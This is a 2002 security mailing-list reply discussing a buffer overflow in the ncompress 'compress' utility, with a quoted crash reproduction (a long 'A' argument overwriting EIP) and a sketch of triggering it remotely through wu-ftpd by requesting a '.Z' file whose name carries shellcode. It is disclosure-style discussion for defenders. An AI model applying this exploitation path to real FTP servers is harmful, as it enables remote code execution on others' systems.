Re: compress(vul) + ftpd(?)

[H D Moore <sflist () digitaloffense net>]

YES.  wu-ftpd will call compress with the file name as an argument if you 
request the file name ending in .Z. You have to be able to write out a file 
name containing the shell code to exploit the bug. I mentioned the compress 
bug back in 1998 and again in 2000, it finally got fixed on some of the newer 
SuSE releases (not sure about Red Hat, I dont use it).

See: http://msgs.securepoint.com/cgi-bin/get/bugtraq0003/179.html

Another fun one is tar, the --use-compress-program option might be 
exploitable under wu-ftpd as well, although I cant think of a way to do it 
offhand.

On Tuesday 05 March 2002 07:43 am, HypH wrote:
> [hyph@port ~]$ rpm -qf `which compress`
> ncompress-4.2.4-21
> [hyph@port ~]$ compress `perl -e 'print "A" x 1100'`
> Segmentation fault  (core dumped)
> [hyph@port ~]$gdb compress core
> eip            0x41414141       0x41414141 <--- :-))
> Compress isn`t suid so it gives us no benefit. And here`s my question:
> Is there any way to force the ftpd to 'compress' a file before sending it,
> from the client`s side. I`m asking for this particular daemon because of
> this:
> -rwxr-xr-x    2 root     root          16k gru 12  2000 compress <-- :-))
>
> The benefits would be obvious.
>
> Sorry if it`s a known bug/vulnerability (but I`ve never heared `bout it
> before)